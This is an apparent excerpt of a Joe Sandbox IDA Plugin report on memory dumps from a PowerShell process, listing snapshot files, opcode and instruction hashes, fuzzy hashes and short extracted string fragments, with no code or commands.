                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_4710000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 0b8763e18d54c5ccead67212fec758258c38ae91d80d72279feb4710cd84f410
                                                                                                                                                                                                                                                • Instruction ID: e1df9eae3a2095286168c1267730f09ed399a72bf063919ae34749681bce675a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0b8763e18d54c5ccead67212fec758258c38ae91d80d72279feb4710cd84f410
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8FD01278A0420E8FC708EFA5D44646EBBB4AB84200F004155DA0593350EA306801CFC1
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.2471064208.0000000004710000.00000040.00000800.00020000.00000000.sdmp, Offset: 04710000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_4710000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 66159a0285947f73e584b4c8df87d065d64c509d06878fb78e238a0411ba4f58
                                                                                                                                                                                                                                                • Instruction ID: 5afecbf0760642ae6486452fc696b0f4a76c5258961e7d4c72feaff1c8aabbd3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 66159a0285947f73e584b4c8df87d065d64c509d06878fb78e238a0411ba4f58
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 56C0021150A3C05FEF4386319DA71053F72895352870E89C298919B063C8288C1ADBA1
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.2471064208.0000000004710000.00000040.00000800.00020000.00000000.sdmp, Offset: 04710000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_4710000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: c95f3dbf11ae21c26433d45c0c06048d0465f6b3783d7db1b4b37f8b7833eab3
                                                                                                                                                                                                                                                • Instruction ID: 187cb1b5efd791df0e5221bc019486ba94e8a39b9841baf3c2a44678da388ce3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c95f3dbf11ae21c26433d45c0c06048d0465f6b3783d7db1b4b37f8b7833eab3
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B5C012390493858FCB0A9B38A0488587F21AB8225831509DCE80A2B2A3DA72A48ADF40
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.2471064208.0000000004710000.00000040.00000800.00020000.00000000.sdmp, Offset: 04710000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_4710000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 0e753c716dbcc29b0d2ff4f542158b49874f80e47bbcda54c7e6d8453ce7916c
                                                                                                                                                                                                                                                • Instruction ID: 23f0ffac0d5afc7bef154f12645d2d24200f65a31608e76355a17ec33da5e29b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0e753c716dbcc29b0d2ff4f542158b49874f80e47bbcda54c7e6d8453ce7916c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 86B092310447098FC24A6F75E408818B369BB4021938008ACE90E1A2928E76E899CA45
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.2471064208.0000000004710000.00000040.00000800.00020000.00000000.sdmp, Offset: 04710000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_4710000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: dc9c167f9f03f541854ca54ba31959a6d04a7378baa086d59da84f6671e1fdb9
                                                                                                                                                                                                                                                • Instruction ID: a548b33b4c07d13a7c7e78df95726497414563d485887686cab71564dcb22fec
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dc9c167f9f03f541854ca54ba31959a6d04a7378baa086d59da84f6671e1fdb9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5AA00236B1411147BF4DDA3B46DB53A7FB357C2201304C56A5213C1254DD386945A514
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.2476975746.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7240000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: fcq$`Q^q$`Q^q$`Q^q$`Q^q$tP^q$tP^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                                                                                                                                                • API String ID: 0-3023990210
                                                                                                                                                                                                                                                • Opcode ID: de4e2906472d5df5dd5e912f73153fd58820ba4853b178ca9b450c12c1522c76
                                                                                                                                                                                                                                                • Instruction ID: 83ef278c7a7279e1286c0bdc6afdca6bf85b413a9a136f1b3de2bc98c8375fd0
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: de4e2906472d5df5dd5e912f73153fd58820ba4853b178ca9b450c12c1522c76
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1702F5B072425EDFCB19CF68C8046AA7BF2AF85311F1484A6E805CB281DB75DDE5C7A1
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.2476975746.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7240000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: fcq$`Q^q$`Q^q$tP^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                                                                                                                                                • API String ID: 0-2306644927
                                                                                                                                                                                                                                                • Opcode ID: e1c7a6a8323a07d557d4699ba75abef9bea86e98b89a85d3679bff496d751265
                                                                                                                                                                                                                                                • Instruction ID: 949a5451f426c8aba91e89b24b6c49870708450b9f980a74ba47c334538464a5
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e1c7a6a8323a07d557d4699ba75abef9bea86e98b89a85d3679bff496d751265
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B5718BB0A3420FDFDB2DCF44C548AAA7BB2AB45351F188095E8059B291C7B5DDE4CBA1
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.2476975746.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7240000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q
                                                                                                                                                                                                                                                • API String ID: 0-3865595929
                                                                                                                                                                                                                                                • Opcode ID: 2a0dc44270726f86d821aa26509cd5af5a0350425b2ad3156d61be3dcb62408a
                                                                                                                                                                                                                                                • Instruction ID: b225e4eb4ea0b05801bce463553ca10b8e3e4a5e21f56f5ecf87b233c21017a9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2a0dc44270726f86d821aa26509cd5af5a0350425b2ad3156d61be3dcb62408a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B4A178B27243569FCB29DB698800766BBF2AF85320F14846AD449DF383DE35C945C7A1
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.2476975746.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7240000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                                                                                                                                                                                                                • API String ID: 0-3272787073
                                                                                                                                                                                                                                                • Opcode ID: 65c000d40ed2a04024d10e180aa1e6bfd2fbacf34e3503501338a1a9c13aa9bd
                                                                                                                                                                                                                                                • Instruction ID: b1d15ea0710da25b893caaab31666cee35f19fb0b560bfb51717f5bc593946ed
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 65c000d40ed2a04024d10e180aa1e6bfd2fbacf34e3503501338a1a9c13aa9bd
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E95139F17343179BDB28DA698800766BBB2AFC6661F24846BC445DB342EF35C845CBA1
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.2471064208.0000000004710000.00000040.00000800.00020000.00000000.sdmp, Offset: 04710000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_4710000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: @n^$@n^$@n^$@n^$@n^
                                                                                                                                                                                                                                                • API String ID: 0-3276179463
                                                                                                                                                                                                                                                • Opcode ID: 17d5d3aba1c5bf7244d8660e23437bce7988132ada10987afcf7fbb43c86a1c2
                                                                                                                                                                                                                                                • Instruction ID: 79da49b2c2a139d545448e699bb11cadda3b6dac4ea550734c534a0777f192f4
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 17d5d3aba1c5bf7244d8660e23437bce7988132ada10987afcf7fbb43c86a1c2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4651386550E3C14FC3179B3C98A84917FF5AFA729830A05DBC4C4CF1A3E9295C1AC7A6
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.2476975746.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7240000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: 4'^q$4'^q$tP^q$tP^q
                                                                                                                                                                                                                                                • API String ID: 0-3859475322
                                                                                                                                                                                                                                                • Opcode ID: 069ab3569fe4821157ca9678640299bf9e73362c06a1ba10690d82242b56ca35
                                                                                                                                                                                                                                                • Instruction ID: 8252fd06be365dc5557a03f1b45f1eea150481c26436a8c557dfa095be18e828
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 069ab3569fe4821157ca9678640299bf9e73362c06a1ba10690d82242b56ca35
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 249167B1B3434BCFCB298B699404667BBF2AFD5311F1984ABD9058F241DB31C896C7A1
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.2471064208.0000000004710000.00000040.00000800.00020000.00000000.sdmp, Offset: 04710000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_4710000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: `_q$`_q$`_q$`_q
                                                                                                                                                                                                                                                • API String ID: 0-3297199963
                                                                                                                                                                                                                                                • Opcode ID: 977cb5e839b28d647ad702cac36baf8618fbdc727cc9469c2ed7ea2de231c3d1
                                                                                                                                                                                                                                                • Instruction ID: 5c2746834aa2e78a8297f0d258548a41eec5968c5310652a693ef18946e7df71
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 977cb5e839b28d647ad702cac36baf8618fbdc727cc9469c2ed7ea2de231c3d1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FBB1A374E012199FDB55DFA9D980A9DFBF2FF88300F108629E419AB315EB34A945CF90
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.2471064208.0000000004710000.00000040.00000800.00020000.00000000.sdmp, Offset: 04710000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_4710000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: `_q$`_q$`_q$`_q
                                                                                                                                                                                                                                                • API String ID: 0-3297199963
                                                                                                                                                                                                                                                • Opcode ID: 0caa8b5ec7993c315355a527525e958c2198df240096a2cfdfd9d03fcf4f76e9
                                                                                                                                                                                                                                                • Instruction ID: 54f98440bb74116f75a5eeb72a410217b51ef1c655489870f49780d3cb361b7d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0caa8b5ec7993c315355a527525e958c2198df240096a2cfdfd9d03fcf4f76e9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C8B18474E002199FDB54DFA9D990A9DFBF2FF88301F108629E419AB314EB74A945CF90
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.2476975746.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7240000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: $^q$$^q$$^q$$^q
                                                                                                                                                                                                                                                • API String ID: 0-2125118731
                                                                                                                                                                                                                                                • Opcode ID: 1100971e66e193dd2fbeb1d5372c6cce1586c0e58d734c9ba8d9be9a0c3fa468
                                                                                                                                                                                                                                                • Instruction ID: 5e934296cdde466fff057e71cfeb7d3891474985f76d2268affa383791425916
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1100971e66e193dd2fbeb1d5372c6cce1586c0e58d734c9ba8d9be9a0c3fa468
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AD2177B1730216ABDB2C5A2B8801B37BBD6ABC0711F24843EE585CF281DE75C8958361
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.2476975746.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7240000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: 4'^q$4'^q$$^q$$^q
                                                                                                                                                                                                                                                • API String ID: 0-2049395529
                                                                                                                                                                                                                                                • Opcode ID: dc75279474e63d4bb2170fbb479ff1e5981e5e59ed69422951343b05927dd6a4
                                                                                                                                                                                                                                                • Instruction ID: 2a31d46d6cc509cd2c0a4d48d40307c1363e102c26fa45ae469cde6939616956
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dc75279474e63d4bb2170fbb479ff1e5981e5e59ed69422951343b05927dd6a4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8501D86072D7965FC73F576808201A56FF29FC3A1071A85D7C540DF296CE294C8983A2